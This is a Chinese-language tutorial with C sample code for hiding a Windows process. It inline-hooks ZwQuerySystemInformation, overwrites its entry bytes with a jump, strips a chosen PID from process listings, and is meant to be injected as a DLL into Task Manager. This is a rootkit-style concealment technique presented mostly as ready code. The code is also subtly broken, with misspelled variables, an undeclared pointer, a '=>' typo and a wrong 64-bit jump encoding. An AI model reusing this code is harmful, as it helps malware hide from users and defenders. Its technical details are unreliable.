// 在Windows中,用户进程的所有操作都是基于WIN32 API来实现的,例如使用任务管理器来查看进程等操作。
// API HOOK技术是一种改变API执行结果的技术。
// PS:ZwQuerySystemInformation函数:
// 功能:获取指定的系统信息。
// 原型:NTSTASTUS WINAPI ZwQuerySystemInformation (
// _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
// _Inout_ PVOID SystemInformaion,
// _In_ ULONG SystemInformationLength,
// _Out_opt_ PULONG ReturnLength
// )
// 参数:SystemInformationClass:要检索系统的信息类型,比如检索进程信息,使用SystemProcessInformation(枚举值为5)。
// SystemInformation:缓存区,用于接收请求的信息,缓存区的大小和结构取决于SystemInformationClass参数。
// SystemInformationLength:缓存区大小。
// ReturnLength:获取函数写入信息的实际大小。
// 结果:成功,返回STATUS_SUCCESS,失败,返回NTSTATUS错误码。
// PS:利用ZwQuerySystemInformation实现进程隐藏的原理:
// 遍历进程使用的EnumProcess和CreateToolhelp32Snapshot函数,其底层都是利用ZwQuerySystemInformation,设置标志位SystemProcessInformation
// 来查询进程信息的。所以,可以利用inline hook技术通过修改ZwQuerySystemInformation入口地址,让其指向自定义的New_ZwQuerySystemInformation函数,
// 在该函数内部调用ZwQuerySystemInformation,如果是查询进程并且进程ID与目标隐藏进程的ID相同,则可以过滤掉该进程的信息,从而实现进程隐藏。
// PS:INLINE HOOK技术:
// inline hook API的核心原理是在获取进程中指定API函数的地址后,修改该API的入口函数地址的前几个字节数据,写入一个跳转指令,使其跳转到自定义的新函数中去执行。
// PS:区分32位系统和64位系统,因为32位系统和64位指针长度是不一样的,这导致地址长度也不同。32位系统中用4个字节表示地址,64位系统中用8个字节表示地址。
// 在32位系统中,汇编跳转语句可写为:jmp _dwNewAddress,对应的机器码为:e9 _dwOffset(跳转偏移,使用相对地址) _dwOffset = _dwNewAddress - _dwAddress。
// 在64位系统中,汇编跳转语句可谢伟:mov rax, _ullNewAddress(长地址,使用绝对地址) jmp rax,对应的机器码为:48 b4 _ullNewAddress
// 所以,要想进行inline hook,32位系统需要更改函数的前5个字节数据;64位系统,需要更改前12个字节数据。
// PS:inline hook的具体流程:
// 1.首先,先获取API函数的地址。可以从进程中获取HOOK API对应的模块地址(使用GetModuleHandle函数),然后,通过GetProcAddress获取API函数在进程中的地址。
// 2.然后,根据32位和64位版本,计算需要修改HOOK API函数的前几个字节数据。若是32位系统,则需要计算跳转偏移,并修改函数的前5个字节数据,
// 若是64位系统,则需要修改函数的前12字节数据。
// 3.接着,修改API函数的前几个字节数据的页面保护属性,更改为可读、可写、可执行,这样是为了确保修改后内存能够执行。
// 4.最后,为了能够还原操作,要在修改数据前先对数据进行备份,然后再修改数据,并还原页面保护属性。
// PS:UNHOOK和HOOK的流程是一样,唯一区别是UNHOOK写入的数据是HOOK操作备份的前几个字节数据。这样,API函数便可恢复正常。
// 示例代码:
void HookApi()
{
// 获取ntdll.dll的加载基址,若没有则返回
HMODULE hDll = ::GetModuleHandle("ntdll.dll");
if (NULL == hDll)
return ;
// 获取ZwQuerySystemInformation函数地址
typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
if (NULL == zwQuerySystemInformation)
return ;
// 32为系统修改前5个字节,64位系统修改前12个字节
#ifndef _WIN64
BYTE pData[5] = {0xe9, 0, 0, 0, 0};
DWORD dwOffset = (DWORD)New_ZwQuerySystemInformation - (DWORD)ZwQuerySystemInformation - 5;
::RtlCopyMemory(&pData[1], &dwOffset, sizeof(dwOffset));
// 保存前5个字节数据
::RtlCopyMemory(g_OldData32, ZwQuerySystemInformation, sizeof(pData));
#else
BYTE pData[12] = {0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0x0};
ULONGLONG ullOffset = (ULONGLONG)New_ZwQuerySystemInformation;
::RtlCopyMemory(&pData[2], &ullOffset, sizeof(ullOffset));
// 保存前12个字节
::RtlCopyMemory(g_OldData64, ZwQuerySystemInformation, sizeof(pData));
#endif
// 设置页面的保护属性为可读、可写、可执行
DWORD dwOldProctect = 0;
::VirtualProtect(ZwQuerySystemInformation, sizeof(pData), PAGE_EXECUTE_READWRITE, &dwOldProtect);
// 修改
::RtlCopyMemory(ZwQuerySystemInformation, pData, sizeof(pData));
// 还原页面保护属性
::VirtualProtect(ZwQuerySytemInformation, sizeof(pData), dwOldProtect, &dwOldProtect);
}
// PS:ZwQuerySystemInformation HOOK函数:
// 示例代码
NTSTATUS WINAPI New_ZwQuerySystemInformation(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength )
{
NTSTATUS status = STATUS_SUCCESS;
PSYSTEM_PROCESS_INFORMATION pCur = NULL;
// 要隐藏的进程PID
DWORD dwHideProcessId = 1224;
// UNHOOK API
UnhookApi();
// 获取ntdll.dll模块
HMODULE hDll = ::GetModuleHandle("ntdll.dll");
if (NULL == hDll)
return status;
// 获取ZwQuerySystemInformation函数地址
typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
if (NULL == ZwQuerySystemInformation)
return status;
// 调用原函数ZwQuerySystemInformation
status = ZwQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
// 判断是否是进程遍历
if (NT_SUCCESS(status) && (5 == SystemInformationClass))
{
pCur = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
// 遍历,剔除隐藏进程的信息
while (TRUE)
{
// 判断是否是要隐藏的进程PID
if (dwHideProcessId == (DWORD)pCur->UniqueProcessId)
{
if (0 == pCur->NextEntryOffset)
{
// 末尾元素
pPrev->NextEntryOffset = 0;
}
else
{
pPrev->NextEntryOffset = pPrev=>NextEntryOffset + pCur->NextEntryOffset;
}
}
else
{
pPrev = pCur;
}
// 退出条件
if (0 == pCur->NextEntryOffset)
break;
pCur = (PSYSTEM_PROCESS_INFORMATION)((PBYTE*)pCur + pCur->NextEntryOffset);
}
}
// HOOK Api
HookApi();
return status;
}
// PS:以上的代码需写入DLL文件,注入到要遍历进程的程序中,比如任务管理器,才能够实现进程隐藏。